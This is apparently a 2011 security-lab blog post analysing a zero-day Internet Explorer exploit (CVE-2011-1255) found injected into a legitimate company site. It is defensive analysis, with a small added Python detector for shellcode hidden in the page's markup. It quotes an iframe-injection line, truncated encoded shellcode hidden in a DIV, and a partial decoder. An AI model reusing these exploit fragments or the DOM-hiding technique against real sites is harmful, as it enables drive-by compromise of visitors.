The Latest in IT Security

0-day exploit used in a targeted attack – CVE-2011-1255

27 Jun 2011

Time Element Memory Corruption, a remote code execution vulnerability recently patched by Microsoft as part of MS11-050 and bearing the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255, is being actively exploited in the wild.

The M86 Security Labs team received for inspection the URL of a legitimate website of a large private company that had been blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.

We were asked to investigate whether it was indeed a malicious page or a case of over-blocking.

The page looked benign, but when we inspected each included JavaScript file, we saw that one of them:

<script type="text/javascript" src="js/js.js"></script>

was injecting an iframe:

<script>document.write("hXXp://–NO-CLICK–www.newhappys.com/ie8.html")</script>

pointing to a malicious page that was very easily classified as malicious, because shellcode patterns were part of the page's DOM:

<HTML XMLNS:t="urn:schemas-microsoft-com:time">
<?IMPORT namespace="t" implementation="#default#time2">
<body>
<div id="x" contenteditable="true" style='width:0;height:0;visibility:hidden'>
MMu9090u9090u10EBu4B5BuC933uB966u03F3u3480uE20BuFAE2u05EBuEBE8uFF[…snip…]
XXu1d16u77c2u1104u77c1u44c3u77c2u2000u0000u1000u0000u0040u0000uc0
[…snip…]
OOu0d20u0d0du5ed5u77c1u0d20u0d0du0d20u0d0du5ed5u77c1u0d20u0d0du0d[…snip…]
TTu0d0fu0d0eKKJJu0d0du0d0dLL1043416UU
<t:TRANSITIONFILTER></t:TRANSITIONFILTER>
<script type="text/javascript">
function de(arr) {
    var temp = new Array();
    var nop = "";
    // re-split the string pulled from the DIV into 5-character "uXXXX" chunks
    for (var i = 0; i < arr.length; i = i + 5) {
        nop = nop + "m" + arr.substring(i, i + 5);
    };
    nop = nop.split("m").toString();
    for (var i = 0; i < nop.length; i++) {
[…snip…]

OK, another infected site, big deal... but after further inspection we saw that it exploited an unpublished security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest, fully patched version of IE.

You can imagine the excitement in the team – a 0-day has been found in the wild!

The excitement of finding a 0-day in the wild didn't last that long, as soon afterwards Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a reasonably high level of certainty that the anonymous researcher who, according to Microsoft's security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, used the vulnerability details for malicious purposes as part of targeted attacks.

We decided to inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack on the well-known iepeers.dll vulnerability, exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patched by Microsoft's MS10-018 security patch for Internet Explorer on 30.3.10.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he was serving his malicious code.

Remember the code snippet above, showing how the attacker hid his shellcode as part of the DOM?

Hiding data in the DOM of the page is a good obfuscation technique: it bypasses security software that does not act as an actual browser, because such software's script engine has no access to the actual DOM.

It turns out that one of the side effects of hiding data inside DIV elements is that it makes the data indexable by search engines.

A Google search for the pattern "TTu0d0fu0d0eKKJJu0d0du0d0dLL1043416UU" revealed about 16 results, and as of this writing only a few were still alive.
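The search works because the encoded payload is literal text in the page, so a scanner that reads text nodes needs no script engine or DOM to see what the hidden DIV carries. This added example (not from the original post or from M86) applies that idea as a gateway-side check: it walks the HTML with Python's html.parser, records which text nodes sit inside invisible elements, and flags runs of "uXXXX" tokens and the repeated u9090 NOP sled seen in the sample above; the sample HTML and its dummy payload are constructed, and the 8-token threshold is an assumed tuning value.

```python
import re
from html.parser import HTMLParser

# Payload shape seen in the page's DIV: runs of "u" + four hex digits (a %uXXXX
# string with the "%" removed, which the page's de() re-splits into 5-char
# chunks). 8+ tokens in a row is an assumed threshold; repeated u9090 is a NOP sled.
ENCODED_RUN = re.compile(r"(?:u[0-9a-fA-F]{4}){8,}")
NOP_SLED = re.compile(r"(?:u9090){2,}")

class TextNodeCollector(HTMLParser):
    """Collect (hidden?, text) for every text node without building a DOM."""
    def __init__(self):
        super().__init__()
        self.hidden_depth = 0   # number of enclosing invisible elements
        self.open_hidden = []   # one bool per open tag: was it invisible?
        self.nodes = []
    def handle_starttag(self, tag, attrs):
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        hidden = ("visibility:hidden" in style or "display:none" in style
                  or ("width:0" in style and "height:0" in style))
        self.open_hidden.append(hidden)
        self.hidden_depth += int(hidden)
    def handle_endtag(self, tag):
        if self.open_hidden and self.open_hidden.pop():
            self.hidden_depth -= 1
    def handle_data(self, data):
        if data.strip():
            self.nodes.append((self.hidden_depth > 0, data.strip()))

def find_dom_shellcode(html):
    """One finding per text node that carries an encoded-shellcode run."""
    collector = TextNodeCollector()
    collector.feed(html)
    findings = []
    for hidden, text in collector.nodes:
        runs = ENCODED_RUN.findall(text)
        if runs:
            findings.append({"hidden": hidden,
                             "tokens": sum(len(r) // 5 for r in runs),
                             "nop_sled": NOP_SLED.search(text) is not None})
    return findings

# Constructed sample modelled on the page's markup; the payload bytes are dummy.
SAMPLE_HTML = (
    '<HTML XMLNS:t="urn:schemas-microsoft-com:time">'
    '<?IMPORT namespace="t" implementation="#default#time2"><body>'
    '<div id="x" contenteditable="true" style="width:0;height:0;visibility:hidden">'
    'MM' + 'u9090' * 4 + 'u4141' * 10 + 'UU'
    '</div><t:TRANSITIONFILTER></t:TRANSITIONFILTER><p>Welcome</p></body></HTML>'
)
```

Running find_dom_shellcode(SAMPLE_HTML) reports one hidden node with 14 encoded tokens and a NOP sled; a visible node with the same pattern is still reported, just with hidden set to False.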

Here is the list of the infected sites according to Google’s search result:


Quite apart from the service of caching samples for us, it is ironic that an attacker's obfuscation technique can be used against him to find his infection servers with a simple Google search. :)
